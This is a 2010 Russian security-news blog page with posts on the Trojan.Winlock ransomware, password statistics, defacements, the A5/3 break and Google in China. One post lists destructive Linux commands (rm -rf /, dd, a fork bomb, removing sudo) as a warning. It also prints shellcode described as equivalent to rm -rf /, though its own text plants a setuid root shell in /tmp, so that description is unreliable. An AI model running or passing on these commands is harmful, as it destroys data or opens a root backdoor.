Около сетевой Блог » hacking

В России Trojan.Winlock заразил миллионы компьютеров

Ioann — Wed, 10 Feb 2010 09:03:38 +0000

Компания «Доктор Веб» предупреждает о том, что эпидемия троянцев семейства Trojan.Winlock набирает обороты. В январе 2010 года количество россиян, пострадавших от вредоносных программ, требующих за разблокировку Windows отправить платное SMS-сообщение, составило несколько миллионов. Предположительные потери составляют сотни миллионов рублей.

[ad#ad-2]
Первые модификации Trojan.Winlock появились около 3-х лет назад. На тот момент они не представляли серьезной угрозы: автоматически удалялись с компьютера через несколько часов после установки, не запускались в Безопасном режиме Windows, а стоимость SMS-cообщений, которые требовали отправить авторы троянца, была не столь высокой, как сейчас (в среднем около 10 рублей в сравнении c 300-600 рублями).

С ноября 2009 года эта схема отъема денег пользуется все большим успехом у злоумышленников – новые модификации Trojan.Winlock становятся все более опасными. За снятие сообщения о блокировке Windows, которое выскакивает поверх всех окон и делает невозможным нормальную работу на компьютере, вирусописатели требуют гораздо больше денег. Троянцы уже не удаляются автоматически из системы в прошествии некоторого времени, но приобретают дополнительный функционал. В частности, они препятствуют запуску некоторых программ в зараженной системе (файловых менеджеров, антируткитов, утилит сбора информации, которая может помочь в лечении системы).

Вредоносные программы семейства Trojan.Winlock распространяются через уязвимости в Windows (в частности, Internet Explorer), вредоносные сайты (скачиваемые кодеки), эксплойты iframe, а также ботнеты (владельцы ботнета продают установку какой-либо вредоносной программы на зараженном компьютере).

Только за январь число пострадавших в России от блокировщиков Windows составило несколько миллионов пользователей. С учетом того, что средняя стоимость SMS-сообщения – 300-600 рублей, предположительные потери россиян от этого вида вредоносного ПО только в первом месяце 2010 года составили сотни миллионов рублей.

В связи с тем, что с каждым днем появляются новые модификации Trojan.Winlock, незащищенными остаются даже те пользователи, которые применяют постоянно обновляемые антивирусные решения различных производителей.

Для помощи пострадавшим компания «Доктор Веб» в специальном разделе своего официального сайта собрала всю актуальную информацию об этих троянцах. В частности, форму разблокировки, которая помогает бесплатно найти необходимый код.
Источник

Мошенник присвоил более 5 млн. рублей с помощью платежного терминала

Ioann — Tue, 02 Feb 2010 10:54:56 +0000

Следственные органы Подмосковья возбудили уголовное дело в отношении жителя Подольского района, который обвиняется в незаконном присвоении более 5 миллионов рублей, сообщил начальник управления информации и общественных связей ГУВД по Московской области Евгений Гильдеев.

[ad#ad-2]
Уголовное дело возбуждено по статье 174.1 УК РФ (легализация денежных средств приобретенных лицом в результате совершения им преступления), которая предусматривает до 15 лет лишения свободы.

Следствием было установлено, что 36-летний житель Подольского района трудился охранником в салоне сотовой связи городе Климовске. Имея свободный доступ к платежным терминалам, он, используя одну и ту же купюру, зачислял на различные счета крупные суммы денег.

Денежные средства он впоследствии легализовывал, осуществляя с ними финансовые операции по переводу и обналичиванию через букмекерскую контору. Сотрудники милиции выявили пять фактов легализации денежных средств, полученных преступным путем.

По словам Гильдеева, с октября 2008 года по февраль 2009 мошенник зачислили на подконтрольные счета более 5, 7 миллиона рублей.

Источник

Двадцать самых популярных паролей :)

Setevik — Thu, 28 Jan 2010 16:48:02 +0000

В прошлом году много говорилось о безопасности, защите и обнаружении угроз. И не смотря на это большенство пользователей продолжает записывать свои пароли на бумажку и приклеивать ее к монитору. Более продвинутые пользователи записывают свои пароли на обратной стороне клавиатуры. Но самая большая проблема даже не в этом, а в том какие пароли выбирают себе пользователи.

[ad#ad-2]
специалисты из Imperva, проанализировав 32 миллиона взломанных паролей, составили список из 20 самых популярных паролей. Итак первое место: пароль «123456″. Запомните этот пароль, он нам еще встретится.
Вы уже наверно улыбаетесь — сейчас вы будете смеяться. На втором месте пароль «12345″. А сейчас я вас добью. На 3ем месте пароль «123456789″.
Дальше по списку:
4) Password
5) iloveyou
6) princess
7) rockyou
1234567
9) 12345679
10) abc123
11) Nicole
12) Daniel
13) babygirl
14) monkey
15) Jessica
16) Lovely
17) michael
18) Ashley
19) 654321 (я же вам говорил запомните пароль — он нам встретится)
20) Qwerty

Такие пароли подбираются очень быстро. Приблизительно для того что бы получить доступ к 1000 учетным записям с такими паролями потребуется 17 минут.
Администраторы!!!! сидите и придумывайте пользователям пароли вида «a!2teer>q?». Программисты!!!! сидите и придумывайте программные средства защиты и шифрования.
Но пока пользователи будут менять их на «123456″ ваш труд бесполезен.

Взломан сайт партии Регионов

Ioann — Thu, 28 Jan 2010 14:40:14 +0000

Неизвестные злоумышленники взломали сайт партии Регионов и разместили на нем угрозы лидеру партии с обещанием взломать все его компьютеры, если кандидат в президенты не прекратит свое участие в выборах. Злоумышленники оставили подпись, намекая на то, что к взлому причастна Юлия Тимошенко – основной конкурент Януковича на президентское кресло в Украине.

[ad#ad-2]
Скриншот взлома: http://mirrors.deface.ru/2010/01/19/www.partyofregions.org.ua/

В настоящий момент сайт партии Регионов возобновил свою работу в обычном режиме.

Напомним, что это не первый взлом сайта партии Регионов. Хакеры, взломавшие сайт в октябре, назвали себя FRONT ZMIN h4ck t34m, намекая на причастность к Арсению Яценюку – также кандидату в президенты Украины.
Источник

Убей свой Linux или 13 команд приводящих к краху

Designer — Wed, 27 Jan 2010 20:22:46 +0000

Мы не один раз рассказывали как сделать работу в среде Linux проще, быстрее и удобнее. Сегодня мы расскажем о том какие команды не стоит выполнять. Их достаточно большое количество, и после их выполнения вашей системе будет невозможно помочь.

[ad#ad-2]

Команды удаляющие всю информацию из вашей домашней папки, папки суперпользователя или всей дисковой подсистемы

    * sudo rm -rf /
    * rm -rf .*
    * dd if=/dev/zero of=/dev/sda
    * mkfs.ext3 /dev/hda
    * whatever > /dev/hda
    * cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
    * find -type f -mtime +30 -exec mv {} /dev/null \;
    * mv ~ /dev/null
    * mv / /dev/null

Команды вызывающие зависание системы или «kernel panic»

    * dd if=/dev/random of=/dev/port
    * :( ){:|:&};: #also known as fork bomb

Команда выполняющая тоже самое что и “rm -rf /”:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Выполнение этой команды сделает невозможным выполнение команд от имени суперпользователя

rm -f /usr/bin/sudo;rm -f /bin/su

P.S. Не выполняйте эти команды:) ну а если …. мы вас предупреждали

P.S.S Вот пример выполнения команды «sudo rm -rf /» на Linux

Взломан алгоритм шифрования данных в сетях сотовых операторов A5/3

Ioann — Wed, 20 Jan 2010 10:52:06 +0000

Новая схема шифрования, предназначенная для защиты 3G сетей, взломана израильскими учеными.
Исследователи Орр Данкельман (Orr Dunkelman), Натан Келлер (Nathan Keller) и Ади Шамир (Adi Shamir) опубликовали во вторник документ, в котором показали, что шифр Касуми (A5/3) может быть взломан с помощью атаки связанного ключа (related-key attack). Сами авторы назвали свою атаку «методом сэндвича», поскольку он состоит из трех слоев – два толстых слоя сверху и снизу, а еще один «тонкий» слой посередине.

[ad#ad-2]
Авторы исследования утверждают, что с помощью связанных ключей и анализа последнего остающегося результата им удалось получить полный 128-битный ключ алгоритма Kasumi, используя всего 4 связанных ключа. Дополнительно для взлома нужно 226 единиц данных, 230 байт памяти и 232 единиц времени. Требования оказались настолько малы, что в ходе эксперимента успешная эмуляция атаки на ПК заняла менее 2 часов.

Для практической атаки на сети 3G необходимо выполнение большого количества условий. Например, атакующий должен сначала собрать несколько миллионов заведомо известных сообщений, зашифрованных с помощью A5/3. Тем не менее, появление теоретических работ, описывающих уязвимость самого стойкого из механизмов шифрования сотовых сетей, доказывает, что потребность в создании новых систем стала актуальной, как никогда.
Источник

Конкуренты отказались поддержать Google в «китайском вопросе»

Ioann — Wed, 20 Jan 2010 09:13:42 +0000

Руководство компаний Microsoft и Hewlett-Packard отказалось поддержать Google в ее стремлении покинуть Китай в случае продолжения политики цензуры и шпионажа со стороны властей этой страны. Об этом заявили в интервью Стив Баллмер от лица Microsoft и Марк Херд от Hewlett-Packard.

[ad#ad-2]
Стив Баллмер говорит, что все происходящее сейчас — это «проблема Google». После этого исполнительный директор Hewlett-Packard назвал КНР «удивительным рынком с выдающимися перспективами». «Все крупные учреждения становятся объектом нападок хакеров. Я не думаю, что действия Google как-либо изменят сложившуюся картину», — говорит Баллмер.

На вопрос о том, перестанет ли Microsoft центрировать результаты поиска для китайских пользователей Bing, Стив Баллмер отвечать отказался. Напомним, что в Google накануне сообщили об отказе от практики фильтрации интернет-контета для китайских пользователей.

Стоит отметить, что действия Google ранее поддержала Yahoo, высказавшаяся против любых попыток краж интеллектуальной собственности и попыток ограничения свободы слова в интернете. Поддержали Google и официальные американские представители в Белом Доме.
Источник

Google не откажется от китайского языка

Ioann — Wed, 20 Jan 2010 09:11:33 +0000

Компания Google не собирается закрывать поиск на китайском языке. Ранее о возможности ухода поисковика с китайского рынка в случае провала переговоров по поводу цензуры в этом сегменте интернета заявлял главный юрист Google Дэвид Драммонд (David Drummond).

[ad#ad-2]
Скандал начался 12 января с записи Драммонда в корпоративном блоге Google. В ней представитель компании рассказал о случаях взлома почтовых аккаунтов различных правозащитников, работающих в Китае, и заявил, что Google больше не будет выполнять требования правительства страны и фильтровать поисковые результаты. В связи с этим, по словам Драммонда, Google может прекратить работу в Китае. Стоит отметить, что прямых обвинений в адрес китайских властей в сообщении Google не содержалось.

По словам источника China Daily в Google, компания будет предоставлять возможность поиска на китайском языке со своего основного сайта даже в том случае, если власти страны вынудят поисковик закрыть свои офисы в стране и сайт google.cn. В настоящее время китайская версия поискового сервиса работает без фильтрации результатов и выдает ранее подвергавшиеся цензуре ссылки.

Китай практически никак не отреагировал на действия Google, несмотря на то, что в конфликт вмешалась госсекретарь США Хиллари Клинтон и потребовала от властей страны объяснений. Единственной реакцией стали слова представителя министерства иностранных дел Китая Цзян Юй, которая заявила, что страна приветствует фирмы, работающие на китайском рынке в соответствии с законами. «Китай как и другие страны управляет интернетом в соответствии с законом», — заявила Цзян.

Ранее Google неоднократно критиковали за сделку с китайскими властями и цензуру поисковых результатов. Китай неоднократно блокировал многие популярные сайты, в том числе Wikipedia и Youtube, за публикацию на них оппозиционных материалов и любой другой информации, которая, по мнению Пекина, является вредной и опасной для жителей страны.
Источник

Вашингтон ждет объяснений от Пекина по поводу хакерских атак

Ioann — Wed, 20 Jan 2010 09:09:18 +0000

Явно скоординированная атака хакеров на интернет-ресурсы более чем 30 компаний, включая Google и Adobe Systems, вызывает серьезную озабоченность в Вашингтоне, заявила госсекретарь США Хилари Клинтон.

[ad#ad-2]
«Мы ждем объяснений от китайского правительства», — заявила г-жа Клинтон.

Хакерские атаки происходят регулярно, однако впервые Google решилась вынести этот инцидент на межправительственный уровень, а также прямо пригрозила свернуть свое присутствие в Китае.

Yahoo также выступила с осуждением атак, проявив редкую солидарность со своим главным конкурентом. При этом в Yahoo отказываются говорить, подверглась ли она сама атаке хакеров.
Источник

Сайт Jeruslamonline.com взломан турецкими хакерами

Ioann — Tue, 19 Jan 2010 10:13:33 +0000

В связи со скандалом, который разгорелся вокруг поведения израильского МИДа по отношению к послу Турции в Израиле, турецкие хакеры взломали портал Jeruslamonline.com, предназначенный для туристов, посещающих израильскую столицу. Хакеры изменили главную страницу портала, на которой разместили антиизраильские надписи.

[ad#ad-2]
В частности, хакеры написали, что их действия – это ответ «на сионистскую агрессию в Палестинской автономии». Они также призвали мусульман к единению против Израиля.

Заместитель генерального директора компании «Ха-Гадир», осуществляющей поддержку сайта, Охад Ронен назвал случившееся «актом сетевого террора». По его словам, программисты прилагают все усилия, чтобы вернуть сайт в рабочее состояние.

О случившемся поставлены в известность МИД, министерство обороны и минсвязи. Эксперты не исключают, что турки и дальше будут пытаться взламывать сайты, принадлежащие еврейским организациям как в Израиле, так и за рубежом.

Источник